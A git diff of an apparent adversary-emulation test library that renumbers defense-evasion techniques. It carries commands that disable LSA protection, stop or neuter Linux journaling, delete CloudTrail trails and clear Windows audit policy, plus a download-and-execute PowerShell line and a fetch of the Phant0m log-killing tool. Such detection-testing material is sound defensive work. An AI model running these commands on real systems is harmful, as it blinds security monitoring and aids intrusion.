Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data. -Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection. -https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection -https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/ -https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/ - -**Supported Platforms:** Windows - -**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d` - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - -```cmd -reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f -``` - -#### Cleanup Commands - -```cmd -reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1 -``` -### Atomic Test #2: Disable journal logging via systemctl utility - -The atomic test disables the journal logging using built-in systemctl utility - -**Supported Platforms:** Linux - -**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f` - -#### Attack Commands: Run with `sh`! Elevation Required (e.g. 
root or admin) - -```sh -sudo systemctl stop systemd-journald #disables journal logging -``` - -#### Cleanup Commands - -```sh -sudo systemctl start systemd-journald #starts journal service -sudo systemctl enable systemd-journald #starts journal service automatically at boot time -``` -### Atomic Test #3: Disable journal logging via sed utility - -The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk - -**Supported Platforms:** Linux - -**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f` - -#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) - -```sh -sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf -``` - -#### Cleanup Commands - -```sh -sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data -sudo systemctl restart systemd-journald #restart the journal service -``` diff --git a/atomics/T1562/T1562.yaml b/atomics/T1562/T1562.yaml deleted file mode 100644 index a94da9a3..00000000 --- a/atomics/T1562/T1562.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -attack_technique: T1562 -display_name: 'Impair Defenses' -atomic_tests: -- name: Windows Disable LSA Protection - auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d - description: | - The following Atomic adds a registry entry to disable LSA Protection. - - The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data. - Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection. - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection - https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/ - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/ - supported_platforms: - - windows - executor: - command: | - reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f - cleanup_command: | - reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1 - name: command_prompt - elevation_required: true -- name: Disable journal logging via systemctl utility - auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f - description: | - The atomic test disables the journal logging using built-in systemctl utility - supported_platforms: - - linux - executor: - command: | - sudo systemctl stop systemd-journald #disables journal logging - cleanup_command: | - sudo systemctl start systemd-journald #starts journal service - sudo systemctl enable systemd-journald #starts journal service automatically at boot time - name: sh - elevation_required: true 
-- name: Disable journal logging via sed utility - auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f - description: | - The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk - supported_platforms: - - linux - executor: - command: | - sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf - cleanup_command: | - sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data - sudo systemctl restart systemd-journald #restart the journal service - name: sh - elevation_required: true diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1685.001/T1685.001.md similarity index 97% rename from atomics/T1562.002/T1562.002.md rename to atomics/T1685.001/T1685.001.md index 05aeb776..7b6c99bd 100644 --- a/atomics/T1562.002/T1562.002.md +++ b/atomics/T1685.001/T1685.001.md @@ -1,4 +1,4 @@ -# T1562.002 - Impair Defenses: Disable Windows Event Logging +# T1685.001 - Disable or Modify Tools: Disable or Modify Windows Event Log ## Description from ATT&CK 
@@ -10,11 +10,11 @@ > > There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging) > -> Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) +> Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. 
For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1685.001_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1685.001_redcanaryco) > > By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind. -[Source](https://attack.mitre.org/techniques/T1562/002) +[Source](https://attack.mitre.org/techniques/T1685/001) ## Atomic Tests @@ -200,7 +200,7 @@ Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| file_name | exe version of Phant0m | path | PathToAtomicsFolder\T1562.002\bin\Phant0m.exe| +| file_name | exe version of Phant0m | path | PathToAtomicsFolder\T1685.001\bin\Phant0m.exe| #### Attack Commands: Run with `command_prompt`! @@ -228,7 +228,7 @@ if (Test-Path "#{file_name}") {exit 0} else {exit 1} ```powershell New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing ``` ### Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1685.001/T1685.001.yaml similarity index 97% rename from atomics/T1562.002/T1562.002.yaml rename to atomics/T1685.001/T1685.001.yaml index 91edceee..5f03fd79 100644 --- a/atomics/T1562.002/T1562.002.yaml +++ b/atomics/T1685.001/T1685.001.yaml 
@@ -1,5 +1,5 @@ -attack_technique: T1562.002 -display_name: 'Impair Defenses: Disable Windows Event Logging' +attack_technique: T1685.001 +display_name: 'Disable or Modify Tools: Disable or Modify Windows Event Log' atomic_tests: - name: Disable Windows IIS HTTP Logging auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db @@ -129,7 +129,7 @@ atomic_tests: file_name: description: exe version of Phant0m type: path - default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe + default: PathToAtomicsFolder\T1685.001\bin\Phant0m.exe dependency_executor_name: powershell dependencies: - description: | @@ -138,7 +138,7 @@ atomic_tests: if (Test-Path "#{file_name}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing executor: command: | "#{file_name}" diff --git a/atomics/T1562.002/bin/phant0m.exe b/atomics/T1685.001/bin/phant0m.exe similarity index 100% rename from atomics/T1562.002/bin/phant0m.exe rename to atomics/T1685.001/bin/phant0m.exe diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1685.002/T1685.002.md similarity index 97% rename from atomics/T1562.008/T1562.008.md rename to atomics/T1685.002/T1685.002.md index 18a650f8..7f221bf4 100644 --- a/atomics/T1562.008/T1562.008.md +++ b/atomics/T1685.002/T1685.002.md @@ -1,4 +1,4 @@ -# T1562.008 - Impair Defenses: Disable Cloud Logs +# T1685.002 - Disable or Modify Tools: Disable or Modify Cloud Log ## Description from ATT&CK 
@@ -6,7 +6,7 @@ > > For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021) -[Source](https://attack.mitre.org/techniques/T1562/008) +[Source](https://attack.mitre.org/techniques/T1685/002) ## Atomic Tests @@ -49,7 +49,7 @@ aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} #### Cleanup Commands ```sh -cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/" +cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/" terraform destroy -auto-approve ``` @@ -88,13 +88,13 @@ echo Please install the terraform and configure your aws default profile ###### Check Prereq Commands ```sh -if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi; +if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi; ``` ###### Get Prereq Commands ```sh -cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/" +cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/" terraform init terraform apply -auto-approve ``` 
@@ -132,7 +132,7 @@ Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_n #### Cleanup Commands ```powershell -cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/" +cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/" terraform destroy -auto-approve ``` @@ -185,13 +185,13 @@ echo Configure your Azure account using: az login. ###### Check Prereq Commands ```powershell -try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} +try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} ``` ###### Get Prereq Commands ```powershell -cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/" +cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/" terraform init terraform apply -auto-approve ``` @@ -262,7 +262,7 @@ Update event selectors in AWS CloudTrail to disable the logging of certain manag | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src| +| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src| | aws_region | AWS region to detonate | string | us-west-2| #### Attack Commands: Run with `sh`! @@ -335,7 +335,7 @@ This Atomic test will use the Stratus Red Team will first setup a CloudTrail log | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src| +| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src| | aws_region | AWS region to detonate | string | us-west-2| #### Attack Commands: Run with `sh`! 
@@ -408,7 +408,7 @@ This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src| +| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src| | aws_region | AWS region to detonate | string | us-west-2| #### Attack Commands: Run with `sh`! diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1685.002/T1685.002.yaml similarity index 97% rename from atomics/T1562.008/T1562.008.yaml rename to atomics/T1685.002/T1685.002.yaml index 7e4a1bbd..4b5ff43e 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1685.002/T1685.002.yaml @@ -1,5 +1,5 @@ -attack_technique: T1562.008 -display_name: 'Impair Defenses: Disable Cloud Logs' +attack_technique: T1685.002 +display_name: 'Disable or Modify Tools: Disable or Modify Cloud Log' atomic_tests: - name: AWS - CloudTrail Changes auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e @@ -36,9 +36,9 @@ atomic_tests: - description: | Check if the dependency resources are already present. prereq_command: | - if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi; + if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi; get_prereq_command: | - cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/" + cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/" terraform init terraform apply -auto-approve executor: @@ -47,7 +47,7 @@ atomic_tests: aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} cleanup_command: | - cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/" + cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/" terraform destroy -auto-approve name: sh elevation_required: false 
@@ -104,9 +104,9 @@ atomic_tests: - description: | Create dependency resources using terraform prereq_command: | - try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} + try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} get_prereq_command: | - cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/" + cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/" terraform init terraform apply -auto-approve executor: @@ -118,7 +118,7 @@ atomic_tests: name: powershell elevation_required: false cleanup_command: | - cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/" + cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/" terraform destroy -auto-approve - name: Office 365 - Exchange Audit Log Disabled auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c @@ -173,7 +173,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/T1685.002/src aws_region: description: AWS region to detonate type: string @@ -228,7 +228,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/T1685.002/src aws_region: description: AWS region to detonate type: string @@ -282,7 +282,7 @@ atomic_tests: stratus_path: description: Path of stratus binary type: path - default: $PathToAtomicsFolder/T1562.008/src + default: $PathToAtomicsFolder/T1685.002/src aws_region: description: AWS region to detonate type: string diff --git a/atomics/T1562.008/src/T1562.008-1/T1562.008-1.tf b/atomics/T1685.002/src/T1685.002-1/T1685.007-1.tf similarity index 100% rename from atomics/T1562.008/src/T1562.008-1/T1562.008-1.tf rename to atomics/T1685.002/src/T1685.002-1/T1685.007-1.tf 
diff --git a/atomics/T1562.008/src/T1562.008-1/policy.json b/atomics/T1685.002/src/T1685.002-1/policy.json similarity index 100% rename from atomics/T1562.008/src/T1562.008-1/policy.json rename to atomics/T1685.002/src/T1685.002-1/policy.json diff --git a/atomics/T1562.008/src/T1562.008-1/terraform.tfvars b/atomics/T1685.002/src/T1685.002-1/terraform.tfvars similarity index 100% rename from atomics/T1562.008/src/T1562.008-1/terraform.tfvars rename to atomics/T1685.002/src/T1685.002-1/terraform.tfvars diff --git a/atomics/T1562.008/src/T1562.008-2/T1562.008-2.tf b/atomics/T1685.002/src/T1685.002-2/T1685.002-2.tf similarity index 100% rename from atomics/T1562.008/src/T1562.008-2/T1562.008-2.tf rename to atomics/T1685.002/src/T1685.002-2/T1685.002-2.tf diff --git a/atomics/T1562.008/src/T1562.008-2/terraform.tfvars b/atomics/T1685.002/src/T1685.002-2/terraform.tfvars similarity index 100% rename from atomics/T1562.008/src/T1562.008-2/terraform.tfvars rename to atomics/T1685.002/src/T1685.002-2/terraform.tfvars diff --git a/atomics/T1562.012/T1562.012.md b/atomics/T1685.004/T1685.004.md similarity index 96% rename from atomics/T1562.012/T1562.012.md rename to atomics/T1685.004/T1685.004.md index 41534671..8f8960c7 100644 --- a/atomics/T1562.012/T1562.012.md +++ b/atomics/T1685.004/T1685.004.md @@ -1,4 +1,4 @@ -# T1562.012 - Impair Defenses: Disable or Modify Linux Audit System +# T1685.004 - Disable or Modify Tools: Disable or Modify Linux Audit System Log ## Description from ATT&CK 
@@ -8,7 +8,7 @@ > > With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014) -[Source](https://attack.mitre.org/techniques/T1562/012) +[Source](https://attack.mitre.org/techniques/T1685/004) ## Atomic Tests diff --git a/atomics/T1562.012/T1562.012.yaml b/atomics/T1685.004/T1685.004.yaml similarity index 95% rename from atomics/T1562.012/T1562.012.yaml rename to atomics/T1685.004/T1685.004.yaml index 62384d49..97af4226 100644 --- a/atomics/T1562.012/T1562.012.yaml +++ b/atomics/T1685.004/T1685.004.yaml @@ -1,5 +1,5 @@ -attack_technique: T1562.012 -display_name: 'Impair Defenses: Disable or Modify Linux Audit System' +attack_technique: T1685.004 +display_name: 'Disable or Modify Tools: Disable or Modify Linux Audit System Log' atomic_tests: - name: Delete all auditd rules using auditctl auto_generated_guid: 33a29ab1-cabb-407f-9448-269041bf2856 diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1685.005/T1685.005.md similarity index 93% rename from atomics/T1070.001/T1070.001.md rename to atomics/T1685.005/T1685.005.md index 83c7ecbb..a7ec38d3 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1685.005/T1685.005.md @@ -1,4 +1,4 @@ -# T1070.001 - Indicator Removal on Host: Clear Windows Event Logs +# T1685.005 - Disable or Modify Tools: Clear Windows Event Logs ## Description from ATT&CK 
@@ -15,7 +15,7 @@ > > Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`. -[Source](https://attack.mitre.org/techniques/T1070/001) +[Source](https://attack.mitre.org/techniques/T1685/005) ## Atomic Tests @@ -76,7 +76,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) -Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" +Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" ``` diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1685.005/T1685.005.yaml similarity index 90% rename from atomics/T1070.001/T1070.001.yaml rename to atomics/T1685.005/T1685.005.yaml index c7ff9bfe..85cc45d1 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1685.005/T1685.005.yaml @@ -1,5 +1,5 @@ -attack_technique: T1070.001 -display_name: 'Indicator Removal on Host: Clear Windows Event Logs' +attack_technique: T1685.005 +display_name: 'Disable or Modify Tools: Clear Windows Event Logs' atomic_tests: - name: Clear Logs auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967 
@@ -56,6 +56,6 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) - Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell elevation_required: true diff --git a/atomics/T1070.001/src/T1070.001-macrocode.txt b/atomics/T1685.005/src/T1685.005-macrocode.txt similarity index 100% rename from atomics/T1070.001/src/T1070.001-macrocode.txt rename to atomics/T1685.005/src/T1685.005-macrocode.txt diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1685.006/T1685.006.md similarity index 98% rename from atomics/T1070.002/T1070.002.md rename to atomics/T1685.006/T1685.006.md index 66217224..6ed8dfa8 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1685.006/T1685.006.md @@ -1,4 +1,4 @@ -# T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs +# T1685.006 - Disable or Modify Tools: Clear Linux or Mac System Logs ## Description from ATT&CK @@ -12,7 +12,7 @@ > * /var/log/maillog: Mail server logs > * /var/log/httpd/: Web server access and error logs -[Source](https://attack.mitre.org/techniques/T1070/002) +[Source](https://attack.mitre.org/techniques/T1685/006) ## Atomic Tests @@ -541,7 +541,7 @@ stat #{journal_folder} ###### Get Prereq Commands ```sh -mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal +mkdir -p #{journal_folder} && touch #{journal_folder}/T1685.006.journal ``` ### Atomic Test #19: Overwrite Linux Mail Spool 
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1685.006/T1685.006.yaml similarity index 98% rename from atomics/T1070.002/T1070.002.yaml rename to atomics/T1685.006/T1685.006.yaml index 880e4eb6..52630dc4 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1685.006/T1685.006.yaml @@ -1,5 +1,5 @@ -attack_technique: T1070.002 -display_name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs' +attack_technique: T1685.006 +display_name: 'Disable or Modify Tools: Clear Linux or Mac System Logs' atomic_tests: - name: rm -rf auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 @@ -362,7 +362,7 @@ atomic_tests: prereq_command: | stat #{journal_folder} get_prereq_command: | - mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal + mkdir -p #{journal_folder} && touch #{journal_folder}/T1685_006.journal executor: command: | sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1685/T1685.md similarity index 74% rename from atomics/T1562.001/T1562.001.md rename to atomics/T1685/T1685.md index 7d2abdd5..fc329e69 100644 --- a/atomics/T1562.001/T1562.001.md +++ b/atomics/T1685/T1685.md @@ -1,4 +1,4 @@ -# T1562.001 - Impair Defenses: Disable or Modify Tools +# T1685 - Disable or Modify Tools ## Description from ATT&CK 
@@ -6,7 +6,7 @@ > > Adversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional. By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot) > -> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. 
Alternatively, they may add new directories to an EDR tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021) +> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1685), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021) > > Adversaries may also focus on specific applications such as Sysmon. 
For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) 
> @@ -18,71 +18,154 @@ > > Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) -[Source](https://attack.mitre.org/techniques/T1562/001) +[Source](https://attack.mitre.org/techniques/T1685) ## Atomic Tests -- [Atomic Test #1: Disable syslog](#atomic-test-1-disable-syslog) -- [Atomic Test #2: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd) -- [Atomic Test #3: Disable Cb Response](#atomic-test-3-disable-cb-response) -- [Atomic Test #4: Disable SELinux](#atomic-test-4-disable-selinux) -- [Atomic Test #5: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux) -- [Atomic Test #6: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response) -- [Atomic Test #7: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch) -- [Atomic Test #8: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella) -- [Atomic Test #9: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper) -- [Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos) -- [Atomic Test #11: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver) -- [Atomic Test #12: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon) -- [Atomic Test #13: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed) -- [Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key) -- [Atomic Test #15: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service) -- [Atomic Test #16: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell) -- [Atomic Test #17: Tamper with 
